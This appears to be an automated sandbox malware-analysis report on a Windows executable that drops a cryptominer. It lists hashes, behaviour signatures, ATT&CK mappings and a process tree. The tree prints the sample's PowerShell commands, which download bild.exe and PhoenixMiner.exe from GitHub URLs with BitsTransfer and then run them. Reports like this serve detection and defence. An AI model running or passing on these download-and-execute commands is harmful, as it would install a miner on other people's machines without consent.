Analysis

  • max time kernel
    85s
  • max time network
    128s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20220812-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20220812-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-08-2022 23:44

General

  • Target

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe

  • Size

    8.3MB

  • MD5

    9ed9ad87a1564fbb5e1b652b3e7148c8

  • SHA1

    0c001b7e9615cbc22eac2a324d8deb7eaf069ff7

  • SHA256

    3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89

  • SHA512

    e49e403a73ff1d10111d23cc70ae95ffae63abbc4a52cfc52c447ee9f15e76ab44f07d0f41e3b3e63a73a07e7748b8ac7ed8c997f1051a10ca5fad1dace4183a

Score
10/10

Malware Config

Extracted

Language
ps1
Deobfuscated
URLs
exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/bild.exe

exe.dropper

https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe

Signatures

  • Executes dropped EXE 1 IoCs
  • Checks computer location settings 2 TTPs 1 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Adds Run key to start application 2 TTPs 2 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs
  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s). Likely ransomware behaviour.

  • Suspicious behavior: EnumeratesProcesses 4 IoCs
  • Suspicious use of AdjustPrivilegeToken 2 IoCs
  • Suspicious use of WriteProcessMemory 9 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe
    "C:\Users\Admin\AppData\Local\Temp\3cc33ce58536242bc9b2029cd9475a287351a379ccbd12da6b8b7bf2cc68be89.exe"
    1⤵
    • Checks computer location settings
    • Suspicious use of WriteProcessMemory
    PID:2596
    • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
      "C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe"
      2⤵
      • Executes dropped EXE
      • Adds Run key to start application
      • Suspicious use of WriteProcessMemory
      PID:3536
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Import-Module BitsTransfer; Start-BitsTransfer -Source https://raw.githubusercontent.com/jkh36/d/main/bild.exe,https://raw.githubusercontent.com/jkh36/d/main/PhoenixMiner.exe -Destination lWr.exe,ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:4860
      • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
        powershell -command Start-Process lWr.exe; Start-Process ck.exe;
        3⤵
        • Suspicious behavior: EnumeratesProcesses
        • Suspicious use of AdjustPrivilegeToken
        PID:2044

Network

MITRE ATT&CK Matrix ATT&CK v6

Persistence

Registry Run Keys / Startup Folder

1
T1060

Defense Evasion

Modify Registry

1
T1112

Discovery

Query Registry

1
T1012

System Information Discovery

2
T1082

Command and Control

Web Service

1
T1102

Replay Monitor

Loading Replay Monitor...

Downloads

  • C:\Users\Admin\AppData\Local\Microsoft\CLR_v4.0_32\UsageLogs\powershell.exe.log
    Filesize

    2KB

    MD5

    b6deac3351c943410eafe90bc93687c8

    SHA1

    34ff10b6e186ff6f7b6f39ebb127ee137ade5589

    SHA256

    1775d61fb6831a2c572bb51d5772952ee13bbee68bde0367546bb04811a70f0a

    SHA512

    3e025c20277dff003fe09afa2a9014d2fe42761bec935f7d7eb917ddb5b8760d5e3bc643e81d28fa7352c398cbdffcc0dbb5302e7fc6b97969387a3ef313b880

  • C:\Users\Admin\AppData\Local\Microsoft\Windows\PowerShell\StartupProfileData-NonInteractive
    Filesize

    19KB

    MD5

    be8d3d727d0b7f29b2887b4a56bc4769

    SHA1

    7206d2bcf0f03be49994039d29cf5639c2c31e1a

    SHA256

    a89667451c4b5790a908dc451fb77c4d450fb9092bc7a301df07135ad56d9dc1

    SHA512

    cb4203ff82a799080fb44cde3c79385fcb5823239b096489323220b5d21e4ddbb67560194357edfa8d7c2b7146ed46835befa08771cb3d6df714eceb339d0d0b

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • C:\Users\Admin\AppData\Local\Temp\RarSFX0\PhoenixMiner.exe
    Filesize

    8.2MB

    MD5

    c74ab76362f2321b7143e8ba2517c16b

    SHA1

    6b4c65e2b1ba59d155c5d453285fae4d3e52b2a6

    SHA256

    938cb901511ceac91acd8b1eaadabd01688852ed1121250b1c5e587f9ee0512f

    SHA512

    2a506ba53d4dc837bfabee920617fddc2152fb0a474f6a197086c6ce1aadf7b1f1bc64e8d27b9759cdd567675273c99f6af29c61e9a6c5184171336a1a869a17

  • memory/2044-152-0x00000000079E0000-0x00000000079FE000-memory.dmp
    Filesize

    120KB

  • memory/2044-155-0x0000000008030000-0x000000000803E000-memory.dmp
    Filesize

    56KB

  • memory/2044-154-0x0000000007E80000-0x0000000007E8A000-memory.dmp
    Filesize

    40KB

  • memory/2044-153-0x0000000008DF0000-0x000000000946A000-memory.dmp
    Filesize

    6.5MB

  • memory/2044-147-0x0000000000000000-mapping.dmp
  • memory/2044-151-0x000000006FD40000-0x000000006FD8C000-memory.dmp
    Filesize

    304KB

  • memory/2044-150-0x0000000007CD0000-0x0000000007D02000-memory.dmp
    Filesize

    200KB

  • memory/2044-156-0x0000000008080000-0x000000000809A000-memory.dmp
    Filesize

    104KB

  • memory/2044-157-0x0000000008070000-0x0000000008078000-memory.dmp
    Filesize

    32KB

  • memory/3536-132-0x0000000000000000-mapping.dmp
  • memory/4860-138-0x00000000051C0000-0x00000000051E2000-memory.dmp
    Filesize

    136KB

  • memory/4860-146-0x0000000007580000-0x0000000007594000-memory.dmp
    Filesize

    80KB

  • memory/4860-145-0x00000000077C0000-0x0000000007D64000-memory.dmp
    Filesize

    5.6MB

  • memory/4860-144-0x0000000007140000-0x0000000007162000-memory.dmp
    Filesize

    136KB

  • memory/4860-143-0x0000000006660000-0x000000000667A000-memory.dmp
    Filesize

    104KB

  • memory/4860-142-0x00000000066D0000-0x0000000006766000-memory.dmp
    Filesize

    600KB

  • memory/4860-141-0x0000000006180000-0x000000000619E000-memory.dmp
    Filesize

    120KB

  • memory/4860-140-0x0000000005B40000-0x0000000005BA6000-memory.dmp
    Filesize

    408KB

  • memory/4860-139-0x0000000005A60000-0x0000000005AC6000-memory.dmp
    Filesize

    408KB

  • memory/4860-137-0x0000000005240000-0x0000000005868000-memory.dmp
    Filesize

    6.2MB

  • memory/4860-136-0x0000000004BD0000-0x0000000004C06000-memory.dmp
    Filesize

    216KB

  • memory/4860-135-0x0000000000000000-mapping.dmp